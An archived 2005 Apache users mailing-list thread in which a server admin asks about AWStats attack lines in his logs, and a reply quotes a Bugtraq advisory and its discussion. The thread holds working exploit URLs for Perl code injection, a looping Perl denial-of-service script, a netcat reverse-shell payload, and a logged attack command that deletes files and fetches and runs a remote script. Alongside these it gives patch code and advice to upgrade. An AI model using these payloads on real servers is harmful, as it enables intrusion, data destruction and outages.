You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Konstantine <li...@gmail.com> on 2005/10/22 08:07:48 UTC
[users@httpd] GET //awstats.pl? in apache logs
My apache logs show rows after rows of following, all from various IP
addresses. This started a couple of days ago. I don't have awstats.
Could somebody tell me what is that? Is there anything I should be
doing? thanks.K.
GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|
HTTP/1.1
Re: [users@httpd] GET //awstats.pl? in apache logs
Posted by Konstantine <li...@gmail.com>.
On 10/22/05, Dave Floyd <da...@pa.press.net> wrote:
> >My apache logs show rows after rows of following, all from various IP
> >addresses. This started a couple of days ago. I don't have awstats.
> >Could somebody tell me what is that? Is there anything I should be
> >doing? thanks.K.
> >GET
> >//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20htt
> >p://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*
> >;echo|
> >HTTP/1.1
> >
> >
> >---------------------------------------------------------------------
>
> Konstantine,
> provided you don't have one of the vulnerable verions of
> awstats installed just give a prayer of thanks. If you have a version
> covered by the following mail, try to disable or upgrade:
>
<snip>
I see. No, I don't have awstats installed. I was trying to get by with
minimum possible for the purposes of this machine. Thanks for your
time. K.
Re: [users@httpd] GET //awstats.pl? in apache logs
Posted by Dave Floyd <da...@pa.press.net>.
>My apache logs show rows after rows of following, all from various IP
>addresses. This started a couple of days ago. I don't have awstats.
>Could somebody tell me what is that? Is there anything I should be
>doing? thanks.K.
>GET
>//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20htt
>p://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*
>;echo|
>HTTP/1.1
>
>
>---------------------------------------------------------------------
Konstantine,
provided you don't have one of the vulnerable verions of
awstats installed just give a prayer of thanks. If you have a version
covered by the following mail, try to disable or upgrade:
At 8:10 +0000 14/2/2005, GHC@www.securityfocus.com,
[ru]@securityfocus.com@www.securit wrote:
>X-VirusChecked: Checked
>X-Env-Sender: bugtraq-return-18123-dave.floyd=pa.press.net@securityfocus.
> com
>X-StarScan-Version: 5.4.11; banners=-,-,-
>X-Originating-IP: [205.206.231.27]
>X-SpamWhitelisted: domain whitelist
>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <ma...@securityfocus.com>
>List-Help: <ma...@securityfocus.com>
>List-Unsubscribe: <ma...@securityfocus.com>
>List-Subscribe: <ma...@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Date: 14 Feb 2005 08:10:40 -0000
>From: GHC@www.securityfocus.com,
> [ru]@securityfocus.com@www.securityfocus.com <fo...@ghc.ru>
>To: bugtraq@securityfocus.com
>Subject: AWStats <= 6.4 Multiple vulnerabilities
>
>
>
>/*==========================================*/
>// GHC -> AWStats <- ADVISORY
>\\ PRODUCT: AWStats
>// VERSION: <= 6.3
>\\ URL: http://awstats.sourceforge.net/
>// VULNERABILITY CLASS: Multiple vulnerabilities
>\\ RISK: high
>/*==========================================*/
>
>[Product Description]
>"AWStats is a free powerful tool that generates advanced web, ftp or
>mail server statistics, graphically.
>This log analyzer works as a CGI or from command line and shows you
>all possible information your log contains,
>in few graphical web pages".
>Current stable version: AWStats 6.3 final
>Development version is 6.4 - 2005-02-06 14:31
>
>[Summary]
>Successful exploitation of an input validation vulnerability in
>AWStats scripts
>allows attackers to execute limited perl directives under the privileges of
>the web server, get sensetive information.
>Some actions of the attacker can lead to denial of service.
>
>[Details]
>Some AWStats's functions can be extended with plugins.
>Two variables (loadplugin & pluginmode) are dealing with it.
>The first one (loadplugin) is responsible for plugins list (plugin1,
>plugin2); the second one
>runs plugin's functions.
>
>Exploitable example (raw log plugin):
>http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadpl
>ugin=rawlog
>
>Server answer:
>192.*.*.* - - [26/Jan/2005:11:01:41 +0300] "GET /cgi-bin/index.cgi
>HTTP/1.1" 500 606
>192.*.*.* - - [26/Jan/2005:11:03:54 +0300] "GET /cgi-bin/index.cgi
>HTTP/1.1" 500 606
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET
>/themes/standard/style.css HTTP/1.1" 200 2986
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /cgi-bin/index.cgi
>HTTP/1.1" 200 7710
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET
>/themes/standard/images/logo.gif HTTP/1.1" 200 14443
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/xml.gif
>HTTP/1.1" 200 429
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET /images/pb_yawps.gif
>HTTP/1.1" 200 2532
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET
>/themes/standard/images/valid-html401.gif HTTP/1.1" 200 2250
>192.*.*.* - - [26/Jan/2005:11:07:54 +0300] "GET
>/themes/standard/images/vcss.gif HTTP/1.1" 200 1547
>192.*.*.* - - [26/Jan/2005:11:08:06 +0300] "GET /cgi-bin/forum.cgi
>HTTP/1.1" 200 7333
>192.*.*.* - - [26/Jan/2005:11:08:11 +0300] "GET /cgi-bin/links.cgi
>HTTP/1.1" 200 7588
>192.*.*.* - - [26/Jan/2005:11:08:12 +0300] "GET /cgi-bin/top10.cgi
>HTTP/1.1" 200 7910
>192.*.*.* - - [26/Jan/2005:11:08:17 +0300] "GET /cgi-bin/admin.cgi
>HTTP/1.1" 200 7340
>192.*.*.* - - [26/Jan/2005:11:08:33 +0300] "GET /yawpsnews.xml
>HTTP/1.1" 200 153
>
>The dangerous fact is that attacker can read sensitive information such as
>IP address, admin scripts names, non encoded GET queries, etc.
>
>Our variables pass some verification (as others), but it is not
>enough for security:
>
>sub Sanitize {
> my $stringtoclean=shift;
> $stringtoclean =~ s/[^\w_\-\\\/\.:\s]//g;
> return $stringtoclean;
>}
>
>Deletes everything but '_', '-', '\', '/', '.', ':' and any blank symbol.
>It's enough for variables with path to configuration files, but not
>for plugin tasks.
>In case of "loadplugin" & "pluginmode" developers obviously have a
>lot of trust to the user.
>
>So, let's see what can be done, in fact.
>
>[1] Perl code execution.
>http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
>
>we'll get the action in next piece of code:
>
># AWStats output is replaced by a plugin output
>if ($PluginMode) {
> my $function="BuildFullHTMLOutput_$PluginMode()";
> eval("$function");
> if ($? || $@) { error("$@"); }
> &html_end(0);
> exit 0;
>}
>
>If variable exists, we'll get code execution. This happens after
>sanitizing (see privious).
>Here we have intresting part in:
> my $function="BuildFullHTMLOutput_$PluginMode()";
> eval("$function");
>
>This is subroutine call (As example sub BuildFullHTMLOutput_rawlog() from
>rawlog.pm plugin).
>Ideal case: "module name"::BuildFullHTMLOutput_"function name"().
>But if we won't specify the name of module (with "loadplugin"
>parameter) we'll get the next:
>
>main::BuildFullHTMLOutput_"function name"().
>
>By the way, there is permited symbol ':' in user input parameters.
>So, we can send:
>
>PluginMode=:print+getpwent
>
>And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
>This will satisfy eval() requirements., and :print getpwent() is executed.
>
>http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:pri
>nt+getpwent
>
>Sanitazing limits user's input, but there is no filtration for call
>sympols '()'.
>Here we can see that somebody can perform DoS attack.
>This is example of simple code for successful DoS exploitation:
>
>#!/usr/bin/perl
>
>use IO::Socket;
>$server = 'www.example.com';
>sub ConnectServer {
> $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
>"$server", PeerPort => "80")
> || die "Error\n";
> print $socket "GET
>/cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep
>HTTP/1.1\n";
> print $socket "Host: $server\n";
> print $socket "Accept: */*\n";
> print $socket "\n\n";
>}
>
>while () {
> $rp = rand;
> &ConnectServer;
>}
>
>[BUGFIX]
>Change vulnerable code for:
>
>sub PluginSanitize {
> my $stringtoclean=shift;
> $stringtoclean =~ s/[^\w]//g;
> return $stringtoclean;
>}
>
>
>[2] Arbitrary plugin including.
>http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../
>usr/libdata/perl/5.00503/blib
>
>Arbitrary module from user's input through "loadplugin" parameter
>can be included with "require" function..
>
>Bugfix - as above or something like this:
>
>opendir (PDIR, './plugins');
>@FilesPDIR = readdir(PDIR);
>closedir (PDIR);
>foreach $FilesPName (@FilesPDIR) {
> if ($FilesPName =~ m/$loadplugin/) {
> }
>}
>
>The good thing is the poison null-byte (%00) has no place (transferes to 00).
>
>[3] Sensetive information leak in AWStats version 6.3(Stable) -
>6.4(Development).
>Every user can access debug function:
>http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
>http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
>
>
>[DISCLOSURE TIMELINE]
>
>10-02-2005 Initial vendor notification.
>14-02-2005 No response.
>14-02-2005 Bug-traq post.
>
>/* ================================================== */
>/* www.ghc.ru -- security games & challenges */
>/* ================================================== */
>/* greets to: RST.void.ru, cr0n & all quest hunters %)*/
>/* Special respect to e-defense. */
>/* ================================================== */
>
>At 16:24 +0100 15/2/2005, Ondra Holecek wrote:
>>|
>>| PluginMode=:print+getpwent
>>|
>>| And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'.
>>| This will satisfy eval() requirements., and :print getpwent() is executed.
>>|
>>|
>>http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:prin
>>t+getpwent
>>|
>>| Sanitazing limits user's input, but there is no filtration for
>>call sympols '()'.
>>
>>no, user is not limited, he can execute ANY command if he add ; at the
>>end of the command, try this
>>
>>awstats.pl?&PluginMode=:print+system('id')+;
>>
>>or even this
>>
>>awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
>
>At 14:25 -0500 15/2/2005, Jamie Pratt wrote:
>>
>>So what are the conditions of this bug/vuln? I can't reproduce
>>this on several 6.3 installs..:
>>
>>awstats 6.3 from source:
>>
>>request:
>>
>>http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+sy
>>stem('id')+;
>>
>>output:
>>****************
>>Error: Can't locate object method "BuildFullHTMLOutput_print" via
>>package "systemid" (perhaps you forgot to load "systemid"?) at
>>(eval 1) line 1.
>>
>>Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or
>>permissions) may be wrong.
>>Check config file, permissions and AWStats documentation (in 'docs'
>>directory).
>>***************
>
>At 20:52 +0100 15/2/2005, Ondra Holecek wrote:
>>
>>It seems this bug works only on my server, i dont know why
>>
>>/awstats.pl?&PluginMode=:print+system('id')+;
>>
>>reply:
>>
>>uid=99(nobody) gid=4294967295 groups=4294967295,98(nobody) 256
>>Error:
>>
>>Setup ('/usr/local/etc/awstats/awstats.conf' file, web server or
>>permissions) may be wrong.
>>Check config file, permissions and AWStats documentation (in 'docs'
>>directory).
>>
>>
>>awstats: Advanced Web Statistics 6.1 (build 1.751) (original)
>>perl: This is perl, v5.8.5 built for i586-linux
>>os: Linux xxx.tld 2.4.22 #4 Wed Jul 7 21:07:03 CEST 2004 i586 unknown
>>unknown GNU/Linux
>
>At 16:38 -0500 15/2/2005, Herman Sheremetyev wrote:
>>
>>It works on mine too, though I still have 6.1. I think you may
>>need to add the config=www.example.com into the url between the '?'
>>and the '&' for it to work properly though. On my linux boxes with
>>apache 2.0 it displays the command output in the page but on
>>openbsd with apache 1.3 it gives a 500 Server Error because the
>>output ends up in the headers somehow. Either way it works though.
>
>At 22:23 +0100 15/2/2005, Ondra Holecek wrote:
>>
>>im sorry i didnt write it, only awstat 6.1 and 6.2 is vulnerable to this
>>bug (system('id'), etc.)
>
>At 12:53 -0800 15/2/2005, William Pratt wrote:
>>
>>Same thing here on both 6.3 and 6.4. I am unable to reproduce this.
>>
>>
>>Error: Can't locate object method "BuildFullHTMLOutput_print" via
>>package "systemid" (perhaps you forgot to load "systemid"?) at
>>(eval 1) line 1.
>>
>>Setup
>>('/usr/local/apache/root/billpratt_net/cgi-bin/awstats/awstats.conf' f
>>ile, web server or permissions) may be wrong.
>>Check config file, permissions and AWStats documentation (in 'docs'
>>directory).
>>
>>William Pratt
>>Sr. Engineering Application Developer
>>Megapath Networks, Inc.
>>Http://www.MegaPath.net
>>
>>I wish there was a knob on the TV to turn up the intelligence.
>>There's a knob called "brightness", but it doesn't seem to work.
>
>At 17:19 -0500 15/2/2005, Jeffrey Wilkinson wrote:
>>
>>Nonetheless, each of these causes AWstats to disclose the full path to the
>>AWstats installation, regardless if *nix or Windows. That alone is enough
>>for concern.
>
>At 14:00 -0700 15/2/2005, twebster@daksoft.com wrote:
>>
>>You may need to specify an awstats config to view
>>
>>example:
>>
>>http://www.site.org/awstats/cgi-bin/awstats.pl?config=websitename&Pl
>>uginMode=:print+system('id')+
>>;
>
>At 16:46 -0500 15/2/2005, Jamie Pratt wrote:
>>
>>Still no dice on 6.3, even with the "config=www.site.org" etc,etc..
>>same error. So.. Can we all agree that 6.3 is not vulnerable,
>>because I'd rather not upgrade to a dev/unstable release for no
>>reason...
>
>At 9:47 -0500 16/2/2005, Thom Craver wrote:
>>
>>I can confirm the bug on 6.3 running Apache 2.0.52.
>>
>>Furthermore, ANY system command inserted in the system() call can
>>be executed. This is a very serious bug. Unpriviledged user or
>>not, with an .rhosts file on a potential attacker's end, scp would
>>work just nicely, then a chmod, then execution of any script they
>>wanted to upload.
>>This issue is not to be taken lightly.
>>
>>Until this issue is resolved, we have commented out the Plugin lines:
>># AWStats output is replaced by a plugin output
>>if ($PluginMode) {
>> my $function="BuildFullHTMLOutput_$PluginMode()";
>> eval("$function");
>> if ($? || $@) { error("$@"); }
>> &html_end(0);
>> exit 0;
>>}
>>
>>If a plugin is called, it is apparently ignored and the stats are displayed.
>>
>>--
>>Thom Craver
>>Corporate Communications, Inc.
>>www.corp-com.com
>
>At 7:45 +0000 16/2/2005, K-OTiK Security wrote:
>>
>>6.4 was released on 2005-02-14 13:13
>>
>>Fixes:
>>- Fix security hole that allowed a user to read log file content even
>> when plugin rawlog was not enabled.
>>- Fix a possible use of AWStats for a DoS attack.
>>- configdir option was broken on windows servers.
>>- Minor fixes
>>
>>Regards
>>K-OTik Security Research & Monitoring Team 24/7
>>http://www.k-otik.com/english
>
>
>At 15:52 -0500 16/2/2005, Micah Brandon wrote:
>>
>> I'm going to have to disagree. Execution of Perl functions
>>is still possible in 6.3. You just have to jimmy it a little and
>>try/guess different plugins that may be installed. I got a hit
>>with 'hostinfo'. Try this on your server:
>>
>>http://server/cgi-bin/awstats.pl?config=someconfig&PluginMode=hostinfo+time
>>
>> Unix time shows up just below 'Whois command failed' error message.
>>That's game over in my book.
>
>At 20:34 -0500 16/2/2005, Michael Scheidell wrote:
>>
>>And the skiddies who tried to exploit something that didn't exist on our
>>site:
>>(this goes on for some time, here is just a snipp)
>>
>>So, anyone out there who decided to do a 'wait and see', don't.
>>
>>Disable awstats, use access rules, upgrade it or all three.
>>
>>217.172.168.109 - - [03/Feb/2005:12:28:28 -0500] "GET
>>//cgi-bin/awstats/awstats.
>>pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible;
>>MSIE 6.
>>0; Windows 98)"
>>217.172.168.109 - - [03/Feb/2005:12:28:29 -0500] "GET
>>//cgi-bin/awstats.pl?confi
>>gdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE
>>6.0; Windo
>>ws 98)"
>>
>>64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET
>>//cgi-bin/awstats/awstats.pl?
>>configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible;
>>MSIE 6.0;
>>Windows 98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:02 -0500] "GET
>>//cgi-bin/awstats.pl?configdi
>>r=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
>>Windows
>>98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
>>//cgi/awstats.pl?configdir=|%
>>20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
>>Windows 98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
>>//awstatswwwroot/cgi-bin/awst
>>ats.pl?configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0
>>(compatible; MSI
>>E 6.0; Windows 98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:03 -0500] "GET
>>//cgi/awstats.pl?configdir=|%
>>20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
>>Windows 98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET
>>//cgi-bin/cgi-bin/awstats.pl?
>>configdir=|%20id%20| HTTP/1.1" 404 8585 "-" "Mozilla/4.0 (compatible;
>>MSIE 6.0;
>>Windows 98)"
>>64.62.145.98 - - [10/Feb/2005:03:59:04 -0500] "GET //cgi-bin/
>>cgi-bin/awstats.pl
>
>At 14:01 -0500 17/2/2005, Matt Wilder wrote:
>>
>>Awstats version 5.6 is not succeptable to this as it does not have the
>>same plugin architecture. Could this be a >= 6.0 bug?
>
>At 14:46 +0000 18/2/2005, newbug Tseng wrote:
>>
>>Hi.
>>Please check
>>http://packetstormsecurity.org/0501-exploits/AWStatsVulnAnalysis.pdf
>>there're some code analysis for awstats.
>
>At 22:26 +0000 3/5/2005, Laurent Destailleur wrote:
>> >Subject: AWStats <= 6.4 Multiple vulnerabilities
>>>
>>
>>Must read AWStats <= 6.3. Version 6.4 is not affected.
>
>
rgds
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org